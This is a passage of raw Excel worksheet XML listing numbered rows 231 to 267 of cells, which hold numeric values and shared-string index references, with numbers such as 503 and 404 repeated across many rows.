      <c r="B231" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C231" s="14" t="s">
        <v>563</v>
      </c>
      <c r="D231" s="6">
        <v>1</v>
      </c>
      <c r="E231" s="6">
        <v>503</v>
      </c>
      <c r="F231" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G231" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H231" s="6">
        <v>454</v>
      </c>
      <c r="I231" s="6">
        <v>0</v>
      </c>
      <c r="J231" s="6">
        <v>399</v>
      </c>
      <c r="K231" s="6">
        <v>35</v>
      </c>
      <c r="L231" s="11"/>
      <c r="M231" s="11"/>
      <c r="N231" s="11" t="s">
        <v>564</v>
      </c>
    </row>
    <row r="232" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A232" s="3">
        <v>231</v>
      </c>
      <c r="B232" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C232" s="14" t="s">
        <v>565</v>
      </c>
      <c r="D232" s="6">
        <v>1</v>
      </c>
      <c r="E232" s="6">
        <v>404</v>
      </c>
      <c r="F232" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G232" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H232" s="6">
        <v>351</v>
      </c>
      <c r="I232" s="6">
        <v>0</v>
      </c>
      <c r="J232" s="6">
        <v>331</v>
      </c>
      <c r="K232" s="6">
        <v>69134</v>
      </c>
      <c r="L232" s="11"/>
      <c r="M232" s="11"/>
      <c r="N232" s="11" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="233" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A233" s="3">
        <v>232</v>
      </c>
      <c r="B233" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C233" s="14" t="s">
        <v>567</v>
      </c>
      <c r="D233" s="6">
        <v>1</v>
      </c>
      <c r="E233" s="6">
        <v>404</v>
      </c>
      <c r="F233" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G233" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H233" s="6">
        <v>353</v>
      </c>
      <c r="I233" s="6">
        <v>0</v>
      </c>
      <c r="J233" s="6">
        <v>331</v>
      </c>
      <c r="K233" s="6">
        <v>69134</v>
      </c>
      <c r="L233" s="11"/>
      <c r="M233" s="11"/>
      <c r="N233" s="11" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="234" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A234" s="3">
        <v>233</v>
      </c>
      <c r="B234" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C234" s="14" t="s">
        <v>570</v>
      </c>
      <c r="D234" s="6">
        <v>1</v>
      </c>
      <c r="E234" s="6">
        <v>404</v>
      </c>
      <c r="F234" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G234" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H234" s="6">
        <v>355</v>
      </c>
      <c r="I234" s="6">
        <v>0</v>
      </c>
      <c r="J234" s="6">
        <v>331</v>
      </c>
      <c r="K234" s="6">
        <v>69134</v>
      </c>
      <c r="L234" s="11"/>
      <c r="M234" s="11"/>
      <c r="N234" s="11" t="s">
        <v>571</v>
      </c>
    </row>
    <row r="235" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A235" s="3">
        <v>234</v>
      </c>
      <c r="B235" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C235" s="14" t="s">
        <v>573</v>
      </c>
      <c r="D235" s="6">
        <v>1</v>
      </c>
      <c r="E235" s="6">
        <v>404</v>
      </c>
      <c r="F235" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G235" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H235" s="6">
        <v>357</v>
      </c>
      <c r="I235" s="6">
        <v>0</v>
      </c>
      <c r="J235" s="6">
        <v>331</v>
      </c>
      <c r="K235" s="6">
        <v>69134</v>
      </c>
      <c r="L235" s="11"/>
      <c r="M235" s="11"/>
      <c r="N235" s="11" t="s">
        <v>574</v>
      </c>
    </row>
    <row r="236" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A236" s="3">
        <v>235</v>
      </c>
      <c r="B236" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C236" s="14" t="s">
        <v>575</v>
      </c>
      <c r="D236" s="6">
        <v>1</v>
      </c>
      <c r="E236" s="6">
        <v>503</v>
      </c>
      <c r="F236" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G236" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H236" s="6">
        <v>385</v>
      </c>
      <c r="I236" s="6">
        <v>0</v>
      </c>
      <c r="J236" s="6">
        <v>399</v>
      </c>
      <c r="K236" s="6">
        <v>35</v>
      </c>
      <c r="L236" s="11"/>
      <c r="M236" s="11"/>
      <c r="N236" s="11" t="s">
        <v>576</v>
      </c>
    </row>
    <row r="237" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A237" s="3">
        <v>236</v>
      </c>
      <c r="B237" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C237" s="14" t="s">
        <v>577</v>
      </c>
      <c r="D237" s="6">
        <v>1</v>
      </c>
      <c r="E237" s="6">
        <v>503</v>
      </c>
      <c r="F237" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G237" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H237" s="6">
        <v>387</v>
      </c>
      <c r="I237" s="6">
        <v>0</v>
      </c>
      <c r="J237" s="6">
        <v>399</v>
      </c>
      <c r="K237" s="6">
        <v>35</v>
      </c>
      <c r="L237" s="11"/>
      <c r="M237" s="11"/>
      <c r="N237" s="11" t="s">
        <v>578</v>
      </c>
    </row>
    <row r="238" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A238" s="3">
        <v>237</v>
      </c>
      <c r="B238" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C238" s="14" t="s">
        <v>580</v>
      </c>
      <c r="D238" s="6">
        <v>1</v>
      </c>
      <c r="E238" s="6">
        <v>503</v>
      </c>
      <c r="F238" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G238" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H238" s="6">
        <v>389</v>
      </c>
      <c r="I238" s="6">
        <v>0</v>
      </c>
      <c r="J238" s="6">
        <v>399</v>
      </c>
      <c r="K238" s="6">
        <v>35</v>
      </c>
      <c r="L238" s="11"/>
      <c r="M238" s="11"/>
      <c r="N238" s="11" t="s">
        <v>581</v>
      </c>
    </row>
    <row r="239" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A239" s="3">
        <v>238</v>
      </c>
      <c r="B239" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C239" s="14" t="s">
        <v>582</v>
      </c>
      <c r="D239" s="6">
        <v>1</v>
      </c>
      <c r="E239" s="6">
        <v>503</v>
      </c>
      <c r="F239" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G239" s="6">
        <v>860</v>
      </c>
      <c r="H239" s="6">
        <v>391</v>
      </c>
      <c r="I239" s="6">
        <v>0</v>
      </c>
      <c r="J239" s="6">
        <v>399</v>
      </c>
      <c r="K239" s="6">
        <v>35</v>
      </c>
      <c r="L239" s="11"/>
      <c r="M239" s="11"/>
      <c r="N239" s="11" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="240" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A240" s="3">
        <v>239</v>
      </c>
      <c r="B240" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C240" s="14" t="s">
        <v>584</v>
      </c>
      <c r="D240" s="6">
        <v>1</v>
      </c>
      <c r="E240" s="6">
        <v>503</v>
      </c>
      <c r="F240" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G240" s="6">
        <v>841</v>
      </c>
      <c r="H240" s="6">
        <v>393</v>
      </c>
      <c r="I240" s="6">
        <v>0</v>
      </c>
      <c r="J240" s="6">
        <v>399</v>
      </c>
      <c r="K240" s="6">
        <v>35</v>
      </c>
      <c r="L240" s="11"/>
      <c r="M240" s="11"/>
      <c r="N240" s="11" t="s">
        <v>585</v>
      </c>
    </row>
    <row r="241" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A241" s="3">
        <v>240</v>
      </c>
      <c r="B241" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C241" s="14" t="s">
        <v>586</v>
      </c>
      <c r="D241" s="6">
        <v>1</v>
      </c>
      <c r="E241" s="6">
        <v>503</v>
      </c>
      <c r="F241" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G241" s="6">
        <v>812</v>
      </c>
      <c r="H241" s="6">
        <v>396</v>
      </c>
      <c r="I241" s="6">
        <v>0</v>
      </c>
      <c r="J241" s="6">
        <v>399</v>
      </c>
      <c r="K241" s="6">
        <v>35</v>
      </c>
      <c r="L241" s="11"/>
      <c r="M241" s="11"/>
      <c r="N241" s="11" t="s">
        <v>587</v>
      </c>
    </row>
    <row r="242" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A242" s="3">
        <v>241</v>
      </c>
      <c r="B242" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C242" s="14" t="s">
        <v>588</v>
      </c>
      <c r="D242" s="6">
        <v>1</v>
      </c>
      <c r="E242" s="6">
        <v>503</v>
      </c>
      <c r="F242" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G242" s="6">
        <v>777</v>
      </c>
      <c r="H242" s="6">
        <v>399</v>
      </c>
      <c r="I242" s="6">
        <v>0</v>
      </c>
      <c r="J242" s="6">
        <v>399</v>
      </c>
      <c r="K242" s="6">
        <v>35</v>
      </c>
      <c r="L242" s="11"/>
      <c r="M242" s="11"/>
      <c r="N242" s="11" t="s">
        <v>589</v>
      </c>
    </row>
    <row r="243" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A243" s="3">
        <v>242</v>
      </c>
      <c r="B243" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C243" s="14" t="s">
        <v>591</v>
      </c>
      <c r="D243" s="6">
        <v>1</v>
      </c>
      <c r="E243" s="6">
        <v>503</v>
      </c>
      <c r="F243" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G243" s="6">
        <v>680</v>
      </c>
      <c r="H243" s="6">
        <v>402</v>
      </c>
      <c r="I243" s="6">
        <v>0</v>
      </c>
      <c r="J243" s="6">
        <v>399</v>
      </c>
      <c r="K243" s="6">
        <v>35</v>
      </c>
      <c r="L243" s="11"/>
      <c r="M243" s="11"/>
      <c r="N243" s="11" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="244" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A244" s="3">
        <v>243</v>
      </c>
      <c r="B244" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C244" s="14" t="s">
        <v>593</v>
      </c>
      <c r="D244" s="6">
        <v>1</v>
      </c>
      <c r="E244" s="6">
        <v>503</v>
      </c>
      <c r="F244" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G244" s="6">
        <v>641</v>
      </c>
      <c r="H244" s="6">
        <v>405</v>
      </c>
      <c r="I244" s="6">
        <v>0</v>
      </c>
      <c r="J244" s="6">
        <v>399</v>
      </c>
      <c r="K244" s="6">
        <v>35</v>
      </c>
      <c r="L244" s="11"/>
      <c r="M244" s="11"/>
      <c r="N244" s="11" t="s">
        <v>594</v>
      </c>
    </row>
    <row r="245" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A245" s="3">
        <v>244</v>
      </c>
      <c r="B245" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C245" s="14" t="s">
        <v>595</v>
      </c>
      <c r="D245" s="6">
        <v>1</v>
      </c>
      <c r="E245" s="6">
        <v>503</v>
      </c>
      <c r="F245" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G245" s="6">
        <v>614</v>
      </c>
      <c r="H245" s="6">
        <v>408</v>
      </c>
      <c r="I245" s="6">
        <v>0</v>
      </c>
      <c r="J245" s="6">
        <v>399</v>
      </c>
      <c r="K245" s="6">
        <v>35</v>
      </c>
      <c r="L245" s="11"/>
      <c r="M245" s="11"/>
      <c r="N245" s="11" t="s">
        <v>596</v>
      </c>
    </row>
    <row r="246" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A246" s="3">
        <v>245</v>
      </c>
      <c r="B246" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C246" s="14" t="s">
        <v>595</v>
      </c>
      <c r="D246" s="6">
        <v>1</v>
      </c>
      <c r="E246" s="6">
        <v>503</v>
      </c>
      <c r="F246" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G246" s="6">
        <v>606</v>
      </c>
      <c r="H246" s="6">
        <v>408</v>
      </c>
      <c r="I246" s="6">
        <v>0</v>
      </c>
      <c r="J246" s="6">
        <v>399</v>
      </c>
      <c r="K246" s="6">
        <v>35</v>
      </c>
      <c r="L246" s="11"/>
      <c r="M246" s="11"/>
      <c r="N246" s="11" t="s">
        <v>596</v>
      </c>
    </row>
    <row r="247" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A247" s="3">
        <v>246</v>
      </c>
      <c r="B247" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C247" s="14" t="s">
        <v>597</v>
      </c>
      <c r="D247" s="6">
        <v>1</v>
      </c>
      <c r="E247" s="6">
        <v>503</v>
      </c>
      <c r="F247" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G247" s="6">
        <v>579</v>
      </c>
      <c r="H247" s="6">
        <v>411</v>
      </c>
      <c r="I247" s="6">
        <v>0</v>
      </c>
      <c r="J247" s="6">
        <v>399</v>
      </c>
      <c r="K247" s="6">
        <v>35</v>
      </c>
      <c r="L247" s="11"/>
      <c r="M247" s="11"/>
      <c r="N247" s="11" t="s">
        <v>598</v>
      </c>
    </row>
    <row r="248" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A248" s="3">
        <v>247</v>
      </c>
      <c r="B248" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C248" s="14" t="s">
        <v>599</v>
      </c>
      <c r="D248" s="6">
        <v>1</v>
      </c>
      <c r="E248" s="6">
        <v>503</v>
      </c>
      <c r="F248" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G248" s="6">
        <v>548</v>
      </c>
      <c r="H248" s="6">
        <v>414</v>
      </c>
      <c r="I248" s="6">
        <v>0</v>
      </c>
      <c r="J248" s="6">
        <v>399</v>
      </c>
      <c r="K248" s="6">
        <v>35</v>
      </c>
      <c r="L248" s="11"/>
      <c r="M248" s="11"/>
      <c r="N248" s="11" t="s">
        <v>600</v>
      </c>
    </row>
    <row r="249" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A249" s="3">
        <v>248</v>
      </c>
      <c r="B249" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C249" s="14" t="s">
        <v>601</v>
      </c>
      <c r="D249" s="6">
        <v>1</v>
      </c>
      <c r="E249" s="6">
        <v>503</v>
      </c>
      <c r="F249" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G249" s="6">
        <v>538</v>
      </c>
      <c r="H249" s="6">
        <v>417</v>
      </c>
      <c r="I249" s="6">
        <v>0</v>
      </c>
      <c r="J249" s="6">
        <v>399</v>
      </c>
      <c r="K249" s="6">
        <v>35</v>
      </c>
      <c r="L249" s="11"/>
      <c r="M249" s="11"/>
      <c r="N249" s="11" t="s">
        <v>602</v>
      </c>
    </row>
    <row r="250" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A250" s="3">
        <v>249</v>
      </c>
      <c r="B250" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C250" s="14" t="s">
        <v>603</v>
      </c>
      <c r="D250" s="6">
        <v>1</v>
      </c>
      <c r="E250" s="6">
        <v>503</v>
      </c>
      <c r="F250" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G250" s="6">
        <v>488</v>
      </c>
      <c r="H250" s="6">
        <v>420</v>
      </c>
      <c r="I250" s="6">
        <v>0</v>
      </c>
      <c r="J250" s="6">
        <v>399</v>
      </c>
      <c r="K250" s="6">
        <v>35</v>
      </c>
      <c r="L250" s="11"/>
      <c r="M250" s="11"/>
      <c r="N250" s="11" t="s">
        <v>604</v>
      </c>
    </row>
    <row r="251" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A251" s="3">
        <v>250</v>
      </c>
      <c r="B251" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C251" s="14" t="s">
        <v>606</v>
      </c>
      <c r="D251" s="6">
        <v>1</v>
      </c>
      <c r="E251" s="6">
        <v>503</v>
      </c>
      <c r="F251" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G251" s="6">
        <v>483</v>
      </c>
      <c r="H251" s="6">
        <v>423</v>
      </c>
      <c r="I251" s="6">
        <v>0</v>
      </c>
      <c r="J251" s="6">
        <v>399</v>
      </c>
      <c r="K251" s="6">
        <v>35</v>
      </c>
      <c r="L251" s="11"/>
      <c r="M251" s="11"/>
      <c r="N251" s="11" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="252" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A252" s="3">
        <v>251</v>
      </c>
      <c r="B252" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C252" s="14" t="s">
        <v>608</v>
      </c>
      <c r="D252" s="6">
        <v>1</v>
      </c>
      <c r="E252" s="6">
        <v>503</v>
      </c>
      <c r="F252" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G252" s="6">
        <v>506</v>
      </c>
      <c r="H252" s="6">
        <v>426</v>
      </c>
      <c r="I252" s="6">
        <v>0</v>
      </c>
      <c r="J252" s="6">
        <v>399</v>
      </c>
      <c r="K252" s="6">
        <v>35</v>
      </c>
      <c r="L252" s="11"/>
      <c r="M252" s="11"/>
      <c r="N252" s="11" t="s">
        <v>609</v>
      </c>
    </row>
    <row r="253" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A253" s="3">
        <v>252</v>
      </c>
      <c r="B253" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C253" s="14" t="s">
        <v>610</v>
      </c>
      <c r="D253" s="6">
        <v>1</v>
      </c>
      <c r="E253" s="6">
        <v>503</v>
      </c>
      <c r="F253" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G253" s="6">
        <v>479</v>
      </c>
      <c r="H253" s="6">
        <v>429</v>
      </c>
      <c r="I253" s="6">
        <v>0</v>
      </c>
      <c r="J253" s="6">
        <v>399</v>
      </c>
      <c r="K253" s="6">
        <v>35</v>
      </c>
      <c r="L253" s="11"/>
      <c r="M253" s="11"/>
      <c r="N253" s="11" t="s">
        <v>611</v>
      </c>
    </row>
    <row r="254" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A254" s="3">
        <v>253</v>
      </c>
      <c r="B254" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C254" s="14" t="s">
        <v>612</v>
      </c>
      <c r="D254" s="6">
        <v>1</v>
      </c>
      <c r="E254" s="6">
        <v>503</v>
      </c>
      <c r="F254" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G254" s="6">
        <v>494</v>
      </c>
      <c r="H254" s="6">
        <v>432</v>
      </c>
      <c r="I254" s="6">
        <v>0</v>
      </c>
      <c r="J254" s="6">
        <v>399</v>
      </c>
      <c r="K254" s="6">
        <v>35</v>
      </c>
      <c r="L254" s="11"/>
      <c r="M254" s="11"/>
      <c r="N254" s="11" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="255" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A255" s="3">
        <v>254</v>
      </c>
      <c r="B255" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C255" s="14" t="s">
        <v>614</v>
      </c>
      <c r="D255" s="6">
        <v>1</v>
      </c>
      <c r="E255" s="6">
        <v>503</v>
      </c>
      <c r="F255" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G255" s="6">
        <v>515</v>
      </c>
      <c r="H255" s="6">
        <v>435</v>
      </c>
      <c r="I255" s="6">
        <v>0</v>
      </c>
      <c r="J255" s="6">
        <v>399</v>
      </c>
      <c r="K255" s="6">
        <v>35</v>
      </c>
      <c r="L255" s="11"/>
      <c r="M255" s="11"/>
      <c r="N255" s="11" t="s">
        <v>615</v>
      </c>
    </row>
    <row r="256" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A256" s="3">
        <v>255</v>
      </c>
      <c r="B256" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C256" s="14" t="s">
        <v>616</v>
      </c>
      <c r="D256" s="6">
        <v>1</v>
      </c>
      <c r="E256" s="6">
        <v>503</v>
      </c>
      <c r="F256" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G256" s="6">
        <v>513</v>
      </c>
      <c r="H256" s="6">
        <v>438</v>
      </c>
      <c r="I256" s="6">
        <v>0</v>
      </c>
      <c r="J256" s="6">
        <v>399</v>
      </c>
      <c r="K256" s="6">
        <v>35</v>
      </c>
      <c r="L256" s="11"/>
      <c r="M256" s="11"/>
      <c r="N256" s="11" t="s">
        <v>617</v>
      </c>
    </row>
    <row r="257" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A257" s="3">
        <v>256</v>
      </c>
      <c r="B257" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C257" s="14" t="s">
        <v>618</v>
      </c>
      <c r="D257" s="6">
        <v>1</v>
      </c>
      <c r="E257" s="6">
        <v>503</v>
      </c>
      <c r="F257" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G257" s="6">
        <v>462</v>
      </c>
      <c r="H257" s="6">
        <v>441</v>
      </c>
      <c r="I257" s="6">
        <v>0</v>
      </c>
      <c r="J257" s="6">
        <v>399</v>
      </c>
      <c r="K257" s="6">
        <v>35</v>
      </c>
      <c r="L257" s="11"/>
      <c r="M257" s="11"/>
      <c r="N257" s="11" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="258" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A258" s="3">
        <v>257</v>
      </c>
      <c r="B258" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C258" s="14" t="s">
        <v>620</v>
      </c>
      <c r="D258" s="6">
        <v>1</v>
      </c>
      <c r="E258" s="6">
        <v>503</v>
      </c>
      <c r="F258" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G258" s="6">
        <v>526</v>
      </c>
      <c r="H258" s="6">
        <v>444</v>
      </c>
      <c r="I258" s="6">
        <v>0</v>
      </c>
      <c r="J258" s="6">
        <v>399</v>
      </c>
      <c r="K258" s="6">
        <v>35</v>
      </c>
      <c r="L258" s="11"/>
      <c r="M258" s="11"/>
      <c r="N258" s="11" t="s">
        <v>621</v>
      </c>
    </row>
    <row r="259" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A259" s="3">
        <v>258</v>
      </c>
      <c r="B259" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C259" s="14" t="s">
        <v>622</v>
      </c>
      <c r="D259" s="6">
        <v>1</v>
      </c>
      <c r="E259" s="6">
        <v>503</v>
      </c>
      <c r="F259" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G259" s="6">
        <v>489</v>
      </c>
      <c r="H259" s="6">
        <v>447</v>
      </c>
      <c r="I259" s="6">
        <v>0</v>
      </c>
      <c r="J259" s="6">
        <v>399</v>
      </c>
      <c r="K259" s="6">
        <v>35</v>
      </c>
      <c r="L259" s="11"/>
      <c r="M259" s="11"/>
      <c r="N259" s="11" t="s">
        <v>623</v>
      </c>
    </row>
    <row r="260" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A260" s="3">
        <v>259</v>
      </c>
      <c r="B260" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C260" s="14" t="s">
        <v>624</v>
      </c>
      <c r="D260" s="6">
        <v>1</v>
      </c>
      <c r="E260" s="6">
        <v>503</v>
      </c>
      <c r="F260" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G260" s="6">
        <v>471</v>
      </c>
      <c r="H260" s="6">
        <v>450</v>
      </c>
      <c r="I260" s="6">
        <v>0</v>
      </c>
      <c r="J260" s="6">
        <v>399</v>
      </c>
      <c r="K260" s="6">
        <v>35</v>
      </c>
      <c r="L260" s="11"/>
      <c r="M260" s="11"/>
      <c r="N260" s="11" t="s">
        <v>625</v>
      </c>
    </row>
    <row r="261" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A261" s="3">
        <v>260</v>
      </c>
      <c r="B261" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C261" s="14" t="s">
        <v>627</v>
      </c>
      <c r="D261" s="6">
        <v>1</v>
      </c>
      <c r="E261" s="6">
        <v>503</v>
      </c>
      <c r="F261" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G261" s="6">
        <v>469</v>
      </c>
      <c r="H261" s="6">
        <v>453</v>
      </c>
      <c r="I261" s="6">
        <v>0</v>
      </c>
      <c r="J261" s="6">
        <v>399</v>
      </c>
      <c r="K261" s="6">
        <v>35</v>
      </c>
      <c r="L261" s="11"/>
      <c r="M261" s="11"/>
      <c r="N261" s="11" t="s">
        <v>628</v>
      </c>
    </row>
    <row r="262" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A262" s="3">
        <v>261</v>
      </c>
      <c r="B262" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C262" s="14" t="s">
        <v>629</v>
      </c>
      <c r="D262" s="6">
        <v>1</v>
      </c>
      <c r="E262" s="6">
        <v>503</v>
      </c>
      <c r="F262" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G262" s="6">
        <v>500</v>
      </c>
      <c r="H262" s="6">
        <v>456</v>
      </c>
      <c r="I262" s="6">
        <v>0</v>
      </c>
      <c r="J262" s="6">
        <v>399</v>
      </c>
      <c r="K262" s="6">
        <v>35</v>
      </c>
      <c r="L262" s="11"/>
      <c r="M262" s="11"/>
      <c r="N262" s="11" t="s">
        <v>630</v>
      </c>
    </row>
    <row r="263" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A263" s="3">
        <v>262</v>
      </c>
      <c r="B263" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C263" s="14" t="s">
        <v>631</v>
      </c>
      <c r="D263" s="6">
        <v>1</v>
      </c>
      <c r="E263" s="6">
        <v>404</v>
      </c>
      <c r="F263" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G263" s="6">
        <v>547</v>
      </c>
      <c r="H263" s="6">
        <v>349</v>
      </c>
      <c r="I263" s="6">
        <v>0</v>
      </c>
      <c r="J263" s="6">
        <v>331</v>
      </c>
      <c r="K263" s="6">
        <v>69134</v>
      </c>
      <c r="L263" s="11"/>
      <c r="M263" s="11"/>
      <c r="N263" s="11" t="s">
        <v>632</v>
      </c>
    </row>
    <row r="264" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A264" s="3">
        <v>263</v>
      </c>
      <c r="B264" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C264" s="14" t="s">
        <v>633</v>
      </c>
      <c r="D264" s="6">
        <v>1</v>
      </c>
      <c r="E264" s="6">
        <v>404</v>
      </c>
      <c r="F264" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G264" s="6">
        <v>799</v>
      </c>
      <c r="H264" s="6">
        <v>351</v>
      </c>
      <c r="I264" s="6">
        <v>0</v>
      </c>
      <c r="J264" s="6">
        <v>331</v>
      </c>
      <c r="K264" s="6">
        <v>69134</v>
      </c>
      <c r="L264" s="11"/>
      <c r="M264" s="11"/>
      <c r="N264" s="11" t="s">
        <v>634</v>
      </c>
    </row>
    <row r="265" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A265" s="3">
        <v>264</v>
      </c>
      <c r="B265" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C265" s="14" t="s">
        <v>635</v>
      </c>
      <c r="D265" s="6">
        <v>1</v>
      </c>
      <c r="E265" s="6">
        <v>404</v>
      </c>
      <c r="F265" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G265" s="6">
        <v>934</v>
      </c>
      <c r="H265" s="6">
        <v>353</v>
      </c>
      <c r="I265" s="6">
        <v>0</v>
      </c>
      <c r="J265" s="6">
        <v>331</v>
      </c>
      <c r="K265" s="6">
        <v>69134</v>
      </c>
      <c r="L265" s="11"/>
      <c r="M265" s="11"/>
      <c r="N265" s="11" t="s">
        <v>636</v>
      </c>
    </row>
    <row r="266" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A266" s="3">
        <v>265</v>
      </c>
      <c r="B266" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C266" s="14" t="s">
        <v>637</v>
      </c>
      <c r="D266" s="6">
        <v>1</v>
      </c>
      <c r="E266" s="6">
        <v>404</v>
      </c>
      <c r="F266" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G266" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H266" s="6">
        <v>355</v>
      </c>
      <c r="I266" s="6">
        <v>0</v>
      </c>
      <c r="J266" s="6">
        <v>331</v>
      </c>
      <c r="K266" s="6">
        <v>69134</v>
      </c>
      <c r="L266" s="11"/>
      <c r="M266" s="11"/>
      <c r="N266" s="11" t="s">
        <v>638</v>
      </c>
    </row>
    <row r="267" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A267" s="3">
        <v>266</v>
      </c>
      <c r="B267" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C267" s="14" t="s">
        <v>639</v>
      </c>
      <c r="D267" s="6">
        <v>1</v>
      </c>
      <c r="E267" s="6">
        <v>404</v>
      </c>
      <c r="F267" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G267" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H267" s="6">
